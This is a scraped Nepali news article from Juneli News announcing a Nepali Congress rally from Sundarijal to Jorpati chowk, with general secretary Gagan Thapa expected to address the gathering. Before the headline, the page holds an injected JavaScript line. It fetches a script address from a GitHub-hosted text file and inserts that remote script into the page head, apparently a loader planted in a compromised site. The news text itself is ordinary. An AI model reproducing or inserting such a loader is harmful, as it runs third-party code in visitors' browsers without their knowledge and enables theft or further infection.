;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); सुन्दरीजल देखि जोरपाटी सम्म कांग्रेसको र्याली आज, गगन थापा आउने – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • सुन्दरीजल देखि जोरपाटी सम्म कांग्रेसको र्याली आज, गगन थापा आउने
Breaking News

सुन्दरीजल देखि जोरपाटी सम्म कांग्रेसको र्याली आज, गगन थापा आउने

जुनेली न्युज, काठमाडौं

नेपाली काँग्रेस काठमाडौं जिल्ला क्षेत्र नं ३ अन्तर्गत  गोकर्णेश्वर नगरपालिकाले आज जोरपाटी चोकमा सभा गर्ने भएको छ।  सभाको सम्बोधन गर्न कांग्रेसका महामन्त्री गगन थापा आउने छन् ।

क्षेत्रीय सभापति सन्तोष चालिसेको नेतृत्वमा सो कार्यक्रम हुने भएको हो |

घरदैलो कार्यक्रम सकिए पछि सुन्दरीजल देखि जोरपाटी चोक सम्म र्याली आउने र जोरपाटी चोकमा आएर कोण सभा हुने जानकारी आएको हो।

कार्यक्रम दिनको १ बजे सुन्दरीजल बाट हिँडेर साथै बाइकमा र्याली सहित जोरपाटी चोकमा आउने कार्यक्रम रहेको छ।

फेसबुक प्रतिक्रियाहरु